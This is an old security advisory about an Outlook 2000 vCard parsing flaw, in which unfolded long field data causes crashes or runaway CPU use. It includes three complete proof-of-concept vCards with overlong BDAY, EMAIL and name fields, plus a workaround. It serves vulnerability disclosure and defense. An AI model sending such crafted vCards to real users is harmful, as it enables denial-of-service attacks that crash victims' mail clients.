Reported August 30, 2000 by Joel Moses
VERSIONS AFFECTED
DESCRIPTION
Outlook 2000 supports vCard
technology, which helps to identify the sender of a given email. vCards are normally sent
as file attachments to an email msg, where the vCard contains various fields and
associated data. Data that exceeds 75 characters in length should be "line
folded" (wrapper) to provide a uniform means of interpreting vCard data. RFC 2426
section 2.6 defines the means for line folding, however Microsoft's implementation does
not follow the specification. Due to this oversite it is possible to cause Outlook 2000 to
consume an unreasonably high amount of CPU time, or to completely crash. An attack could
be launched by sending a vCard that contains long field data.
DEMONSTRATION
The following fields cause a buffer
overflow:
email:
bday; value=date (as low as 52 characters of form YYYY-MM-D(60)
The following fields cause excessive CPU utilization:
name:
nickname:
fn:
title:
title;language=de;value=text:
tel:
tel;
The following examples were provided by the
discoverer and are copied verbatim from the discoverer's original bulletin:
Examples
========
The following examples will cause the advertised behavior.
1) A modification of the "bday" field to extend beyond 55 characters.
This example appears to be the smallest amount of text required to
elicit the symptom. This example will cause Outlook 2000 to overflow
and terminate.
BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927
4982739472937492873
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
2) A modification of the "e-mail" field with a large amount of text
data masquerading as an e-mail address. This example will cause
Outlook 2000 to overflow and terminate.
BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflo
.possible.sadsack.not hing.doing.is.an.overflow.possible.
.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD
3) A modification of the "N" or "name" field with a large amount of
text will not cause Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.
BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister
Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
VENDOR RESPONSE
Microsoft is aware of this problem, however no response was avauilable at the time
of this writing.
To temporarily work around the problem to avoid viewing a vCard digitil ID,
disassociate the "Digital ID File" from Outlook's Address Book by using the
desktop Explorer. From the View pulldown menu choose Folder Options. When the dialog is
displayed, select the File Types tab and scroll down to select the "Digital ID
File" type. Before removing the file type be sure to record its associated command so
that you can restore the file type at a later date when deemed appropriate. To record the
command association, select Edit on the main dialog, and then select Edit again on the
Edit File Type dialog. The command association will be displayed in the "Application used to perform action" field, where you may copy it for
later redefinition.
CREDIT
Discovered by Joel Moses